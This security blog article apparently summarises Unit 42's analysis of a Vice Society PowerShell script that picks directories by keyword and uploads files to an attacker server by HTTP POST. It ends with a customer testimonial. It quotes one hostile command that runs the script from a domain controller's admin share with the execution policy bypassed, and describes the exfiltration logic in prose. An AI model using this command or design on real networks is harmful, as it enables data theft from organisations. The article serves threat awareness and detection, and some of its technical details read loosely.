The threat actor known as Vice Society, a ransomware gang known for their attacks against the education sector in the USA, has recently been found to use a custom Microsoft PowerShell (PS) script for exfiltrating data from their victims. This threat actor previously used PS scripts staged on a domain controller to perform a range of malicious activities, such as system discovery, system changes, defence evasion, persistence, data exfiltration, and delivering ransomware payloads. Researchers from Palo Alto Network’s Unit 42 Incident Response team have discovered that the Vice Society actors are now using an automated PS script w1.ps1 in their data exfiltration attacks, where the script itself chooses what data to exfiltrate rather than using any arguments.
The PS script used in these attacks executes the command powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1 on a domain controller on the victim’s network, where the s$ admin share on that domain controller is specified in the attack. The Uniform Resource Name (URN) path of this address has been changed to [redacted_ip]. As the attackers are targeting the domain controller on a network, this could mean their actual target machine is one they have been unable to gain access to. Targeting the domain controller gives them the ability to execute this script on any endpoint on the network. The bypass parameter -ExecutionPolicy is included in the PS script so that any execution policy restrictions on the network do not prevent the execution of this file.
In the attack event investigated by Unit 42 researchers, the script began by declaring constants $id and $token, which were found to be hard coded to TEST and TEST_1 respectively. In other attacks these variables might be used for victim identification, however it could also be the case that these are always resolved as a test. The script then declares the functions that begin the main body of the attack, to identify directories with potential for exploitation, processing these directories into groups, and then exfiltration of this data via HTTP POST requests. Before these functions are called, the script first identifies a list of mounted drives using the WMI service (Windows Management Instrumentation). This is performed through a call to get-wmiobject win32_volume which then creates an array named $drives containing the list of drives. Each drive path is individually found and passed to the Work() function to process the directories.
The script then calls the main functions, starting with Work($disk) which is used to identify potential directories for exfiltration. A hard coded list of directories that should be ignored is included in the script. The Show($name) function is then called to pass the names of identified directories not on the ignore list and chunks them into groups of five before passing them to the next function to be processed further. CreateJobLocal($folders) receives these groups of five directories and creates the PS script blocks needed to run the jobs through Start-Job cmdlet. The directory names are then passed through an inclusion/exclusion process that chooses which directories to pass on to the fill() function for exfiltration based on keywords included in the directory name. Directories that match the include list are found first, followed by a check of the directories that do not match the include list. This is performed through the -Include parameter of the Get-ChildItem cmdlet which is the way in which this PS script can choose for itself which directories to exfiltrate rather than just searching based on hard coded lists of names.
The fill([string]$filename) function is then called to perform the actual data exfiltration via HTTP POST requests to a web server controlled by the threat actor Vice Society. A $prefix value is built which includes the server IP address for where the files will be uploaded, and a network port number, which can be a custom port number, 80, or 443. These are two of the most important indicators of compromise (IoCs) from this attack, the rest of which are not fully known due to the original file hash not being available, with Unit 42 researchers instead publishing the filename (w1.ps1) and contents from the recovered script. The variables $id and $token which were first declared at the start of the PS script are not a necessary part of this fill() function, however they are utilised in the upload URL of each file.
The HTTP-based data exfiltration is then begun through the creation of a WebClient object and the building of a $fullPath variable. This variable is the full file patch that is being exfiltrated, so if the HTTP POST requests are obtained after an exfiltration event, it will be possible to create a list of all exfiltrated files, as long as the source host’s IP is also known. The URL for file upload is then built through $uri by a combination of the $prefix, $token, $id and $fullPath variables. The WebClient.UploadFile() method is then called to finalise the data exfiltration through the creation of an HTTP POST event. When the script is performing this HTTP activity, the researchers noted that the fullpath POST parameter did not have the drive letter from which the file was sent included. It also did not provide a user agent string to the web server.
The use of a PowerShell script in Vice Society ransomware attacks is a living off the land method for evading detection while performing data exfiltration. This means that some security software will not detect and notify the user of the presence of this malicious script as PS scripts are so often seen in Windows environments. If you suspect that a ransomware attack using this script has taken place on your network, Unit 42 researchers have developed a YARA rule to help identify this script if it is present on any given system. Although the education sector has been a main target for this threat actor in the past, it is possible that businesses from any sector could be targeted. The hard coded inclusion and exclusion lists are not the only way in which data is selected for exfiltration in these attacks, with the script itself having the ability to choose extra files that are not on the inclusion list based on keywords. The script excludes files over 10 KB in size, and specifically targets folders with over 433 strings in a small range of chosen languages, with a main focus on German and English, so although not all files are able to be selected by this script for exfiltration, businesses who operate within countries that speak English, Czech, German, Lithuanian, Luxembourgish, Portuguese, and Polish are most likely to be victimised by this attack.
“We were very impressed with the service, I will say, the vulnerability found was one our previous organisation had not picked up, which does make you wonder if anything else was missed.”
Aim Ltd Chief Technology Officer (CTO)